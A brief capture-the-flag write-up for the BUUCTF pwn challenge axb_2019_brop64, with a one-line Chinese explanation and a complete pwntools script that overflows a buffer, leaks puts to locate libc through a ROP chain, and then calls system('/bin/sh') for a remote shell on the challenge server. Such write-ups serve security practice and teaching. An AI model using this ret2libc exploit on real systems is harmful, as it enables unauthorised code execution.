[BUUCTF-pwn]——axb_2019_brop64
利用这里leek地址, 找到libc基地址进而找到system, binsh,构造rop链
exploit
from pwn import *
from LibcSearcher import *
p = remote('node3.buuoj.cn',26212)
#p = process('./axb_2019_brop64')
elf = ELF('./axb_2019_brop64')
context.log_level = 'debug'
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
main = elf.symbols['main']
pop_rdi = 0x0000000000400963
#gdb.attach(p)
payload = "If there is a chance,I won't make any mistake!\n\x00" + 'a' * (0xd0+8 - 48) + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main)
p.sendafter('Please tell me:', payload)
p.recvline()
puts_addr = u64(p.recv(6).ljust(8,'\x00'))
log.success("puts_addr -----> :" + hex(puts_addr))
libc = LibcSearcher("puts",puts_addr)
libc_base = puts_addr - libc.dump("puts")
info("libc_base -----> " + hex(libc_base))
sys_addr = libc_base + libc.dump("system")
binsh = libc_base + libc.dump("str_bin_sh")
payload = "If there is a chance,I won't make any mistake!\n\x00" + 'a' * (0xd0+8 - 48) + p64(pop_rdi) + p64(binsh) + p64(sys_addr) + p64(main)
p.sendafter('Please tell me:', payload)
p.interactive()